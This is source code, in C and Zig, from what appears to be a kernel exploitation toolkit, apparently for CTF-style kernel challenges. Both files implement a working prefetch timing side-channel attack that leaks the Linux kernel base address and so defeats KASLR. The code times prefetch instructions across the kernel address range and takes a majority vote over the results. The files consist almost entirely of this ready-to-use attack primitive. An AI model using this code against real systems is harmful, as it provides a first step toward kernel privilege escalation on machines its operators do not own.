File: pwnenv/kernel/template/prefetch.c
#include <stdint.h>
#include <stdio.h>

#include "util.h"

static u64 measure_prefetch_time(const u64 addr) {
    u64 ret;
    asm volatile(
        ".intel_syntax noprefix;"
        "rdtsc;"
        "mov r8, rdx;"
        "shl r8, 32;"
        "or r8, rax;"
        "lfence;"
        "prefetchnta [%1];"
        "prefetcht2 [%1];"
        "lfence;"
        "rdtsc;"
        "shl rdx, 32;"
        "or rax, rdx;"
        "sub rax, r8;"
        "mov %0, rax;"
        ".att_syntax;"
        : "=r"(ret)
        : "r"(addr)
        : "rax", "rdx", "r8", "memory");
    return ret;
}

static u64 find_outlier_index(const u64 *times, u64 count) {
    if (count == 0) {
        return 0;
    }

    double mean = 0.0;
    for (u64 i = 0; i < count; i++) {
        mean += (double)times[i];
    }
    mean /= count;

    double max_diff = -1.0;
    u64 outlier_idx = 0;
    for (u64 i = 0; i < count; i++) {
        const double diff = FABS((double)times[i] - mean);
        if (diff > max_diff) {
            max_diff = diff;
            outlier_idx = i;
        }
    }
    return outlier_idx;
}

u64 prefetch_kbase() {
    puts("[ ] finding kbase by prefetch side-channel attack");
    u64 num_trials = 10;
    const u64 num_vote = 10;
    const u64 start = 0xffffffff81000000;
    const u64 end = 0xffffffffc0000000;
    const u64 step = 0x40000;

    const u64 num_steps = (end - start) / step;

    // 攻撃を num_trials 回繰り返す
    while (num_trials--) {
        u64 cand_addr[num_vote];
        u64 min_time[num_steps];
        // num_vote 回 prefetch side-channel 攻撃を行う
        for (u64 vote = 0; vote < num_vote; vote++) {
            for (u64 i = 0; i < num_steps; i++) {
                min_time[i] = UINT64_MAX;
            }
            // base address 候補を 16 回ずつ prefetch してみる
            u64 num_prefetch = 16;
            while (num_prefetch--) {
                for (u64 i = 0; i < num_steps; i++) {
                    const u64 time = measure_prefetch_time(start + step * i);
                    min_time[i] = MIN(time, min_time[i]);
                }
            }
            // 最も平均から離れているアドレスに投票
            const u64 outlier_index = find_outlier_index(min_time, num_steps);
            cand_addr[vote] = (start + step * outlier_index) & ~0xfffff;
        }
        // 集めた候補に対して、過半数の投票があったかを確認する
        for (u64 i = 0; i < num_vote; i++) {
            const u64 addr = cand_addr[i];
            u64 count = 0;
            for (u64 j = 0; j < num_vote; j++) {
                if (addr == cand_addr[j]) {
                    count++;
                }
            }
            if (count > num_vote / 2) {
                printf("[+] found kbase by prefetch side-channel attack");
                printf("[+] kbase = %#lx\n", addr);
                return addr;
            }
        }
    }
    puts("[-] unable to detect kbase by prefetch side-channel attack");
    return 0;
}

File: pwnenv/kernel/kzig/prefetch.zig
const std = @import("std");
const ctx_mod = @import("context.zig");

fn measure_prefetch_time(addr: u64) u64 {
    return asm volatile (
        \\rdtsc
        \\mov %%rdx, %%r8
        \\shl $32, %%r8
        \\or %%rax, %%r8
        \\lfence
        \\prefetchnta (%[addr])
        \\prefetcht2 (%[addr])
        \\lfence
        \\rdtsc
        \\shl $32, %%rdx
        \\or %%rdx, %%rax
        \\sub %%r8, %%rax
        : [ret] "={rax}" (-> u64),
        : [addr] "r" (addr),
        : .{ .rdx = true, .r8 = true, .memory = true }
    );
}

fn find_outlier_index(times: []const u64) usize {
    if (times.len == 0) {
        return 0;
    }

    var mean: f64 = 0.0;
    for (times) |t| {
        mean += @as(f64, @floatFromInt(t));
    }
    mean /= @as(f64, @floatFromInt(times.len));

    var max_diff: f64 = -1.0;
    var outlier_idx: usize = 0;
    for (times, 0..) |t, i| {
        const diff = @abs(@as(f64, @floatFromInt(t)) - mean);
        if (diff > max_diff) {
            max_diff = diff;
            outlier_idx = i;
        }
    }

    return outlier_idx;
}

// requires `-enable-kvm`
pub fn prefetch_kbase() u64 {
    std.debug.print("[ ] finding kbase by prefetch side-channel attack\n", .{});

    var num_trials: u64 = 10;
    const num_vote: usize = 10;
    const start: u64 = 0xffffffff81000000;
    const end: u64 = 0xffffffffc0000000;
    const step: u64 = 0x40000;
    const num_steps: usize = @intCast((end - start) / step);

    while (num_trials > 0) : (num_trials -= 1) {
        var cand_addr: [num_vote]u64 = undefined;
        var min_time: [num_steps]u64 = undefined;

        var vote: usize = 0;
        while (vote < num_vote) : (vote += 1) {
            for (&min_time) |*v| {
                v.* = std.math.maxInt(u64);
            }

            var num_prefetch: u64 = 16;
            while (num_prefetch > 0) : (num_prefetch -= 1) {
                var i: usize = 0;
                while (i < num_steps) : (i += 1) {
                    const addr = start + step * @as(u64, @intCast(i));
                    const time = measure_prefetch_time(addr);
                    if (time < min_time[i]) {
                        min_time[i] = time;
                    }
                }
            }

            const outlier_index = find_outlier_index(min_time[0..]);
            cand_addr[vote] = (start + step * @as(u64, @intCast(outlier_index))) & ~@as(u64, 0xfffff);
        }

        var i: usize = 0;
        while (i < num_vote) : (i += 1) {
            const addr = cand_addr[i];
            var count: usize = 0;

            var j: usize = 0;
            while (j < num_vote) : (j += 1) {
                if (addr == cand_addr[j]) {
                    count += 1;
                }
            }

            if (count > (num_vote / 2)) {
                std.debug.print("[+] found kbase by prefetch side-channel attack\n", .{});
                std.debug.print("[+] kbase = 0x{x}\n", .{addr});
                return addr;
            }
        }
    }

    std.debug.print("[-] unable to detect kbase by prefetch side-channel attack\n", .{});
    return 0;
}

pub fn set_kbase(ctx: *ctx_mod.ctx) void {
    ctx.kbase = prefetch_kbase();
}
